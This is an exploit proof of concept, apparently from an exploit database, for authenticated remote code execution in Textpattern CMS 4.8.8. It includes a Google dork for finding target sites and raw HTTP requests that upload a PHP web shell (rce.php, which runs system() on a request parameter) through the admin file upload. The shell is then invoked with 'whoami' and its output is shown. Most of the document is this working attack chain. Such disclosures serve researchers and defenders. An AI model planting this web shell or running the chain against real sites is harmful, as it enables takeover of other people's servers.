# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Login admin account and go settings of site
# Step 2: Upload a file to web site and selecet the rce.php
# Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
############# POST REQUEST (FILE UPLOAD) ############################## (1)
POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"
16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
############ POST RESPONSE (FILE UPLOAD) ######### (1)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8
___________________________________________________________________________________________________________________________________________________
############ REQUEST TO THE PAYLOAD ############################### (2)
GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close
############ RESPONSE THE PAYLOAD ############################### (2)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>alpernae\alperen
</pre>
========>>> END REQUEST <<<=========